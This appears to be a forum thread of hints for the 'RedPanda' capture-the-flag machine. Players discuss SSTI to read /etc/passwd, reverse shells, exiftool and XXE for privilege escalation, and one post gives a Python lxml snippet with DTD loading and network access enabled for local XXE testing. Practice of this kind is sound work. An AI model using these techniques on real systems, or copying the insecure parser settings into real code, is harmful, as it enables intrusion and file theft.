Official RedPanda Discussion

did you ever figure it out?

Can someone DM me on this? Iā€™ve tried lots of different payloads and Iā€™m not getting any closer.

Hey, iā€™m working on PE. I think i know what i have to do, but I need to write metadata to an image. Can someone recommend me a tool for this, or do i have to write my own code using the same library used in the original (victimā€™s) code?

So Im having a reverse shell issue. My exploit works and I receive a connection via our favorite kitty but I have no shell. Just the PID and a connection conformation on my end. I tried .traditional to use the -e but no luck there. I can cat and look around. I found the user but not the flag with my attack only. My kitty is mute.

Im in I just cant talk to her. Can someone DM me??

Dm

have a look on exiftool

ty. Yes, i found it and it works

Hi, for some reason the user flag is not accepted. I suspect it was tampered with. Can anybody help fix the situation? Thanks in advance :smiley:

Hi Guys, I am new here and looking for walkthrough. Kindly help

only when machine get retired

1 Like

No tu nā€™es pas au bon endroit

You could give me a clue and I found a way to list the system a little but I am a little stuck since I do not receive most of the syntax that I introduce.

I did find the correct SSTI to dump /etc/passwd for instance, also the user flag by cat /dir/user.txt. But encoding and passing a bash revshellā€¦grrrr it just does not phone home! Do we have to call getInputStream after or waitFor? Itā€™s my first java machine

I would recommend a stageless reverse shell instead of using bash to phone home.

1 Like

I also need help with the shell.
I have tried everything from directly executing the commands, uploading shells, ssh without any connections possible.

I do have a shell now.

upload works, however making the file executable is ā€œunusualā€.

Why is making the file executable unusual?

Not really unusual. I could not use the +x option with chmod. I had to use numerical permissions

it is possible by downloading a file and running it, and it is also possible to do it from a command line, but you will have to test a lot of possibilities until you get it, I think the simplest way is to download and run your revshell

Despite the difficulty increase, I really liked this box. Some neat concepts to learn.

User:
Already a lot of hints on this so I wonā€™t go much further. My big hint is donā€™t try to skip ahead without understanding whatā€™s going on. Follow the HackTricks article on the technique as much as you can. Because of the WAF, the crucial step of figuring out what is running isnā€™t straightforward but if you mess around on the site you will see a reference to a certain footwear tool. This should narrow down what is running greatly. From there, Google tutorials for the software you think is running.

To reiterate - you canā€™t just copy paste exploits, you are going to have to use some research to make a slight (very very slight) modification to get it to work but if you found a tutorial for the underlying software, you should have a good guess.

Root:
PSpy is your friend. See whatā€™s running and dig into it. Once again, trying to skip through fast will end up slowing you down more. Read everything and understand what is going on.

The video posted above on XXE is a really good watch. If you watch that video and look through what you find on the system, you should have a pretty good idea of your end goal. To reach that goal you actually need to exploit a second vulnerability of the running application due to your userā€™s low running privileges. You canā€™t test everything locally but at a minimum I would recommend testing the XXE locally. If you want to play around with it locally, there are safety measures in most parsers so Iā€™ll just save you some time and give you a helpful Python code snippet for local testing:

from lxml import etree 
parser = etree.XMLParser(load_dtd=True, no_network=False, huge_tree=True) 
tree = etree.parse("test.xml", parser=parser) 
etree.dump(tree.getroot())

Hi, Im getting a reverse shell but it seems unstable. the site is getting connection timeout. is the machine unstable or my payload was wrong. Please give me a nudge. thanks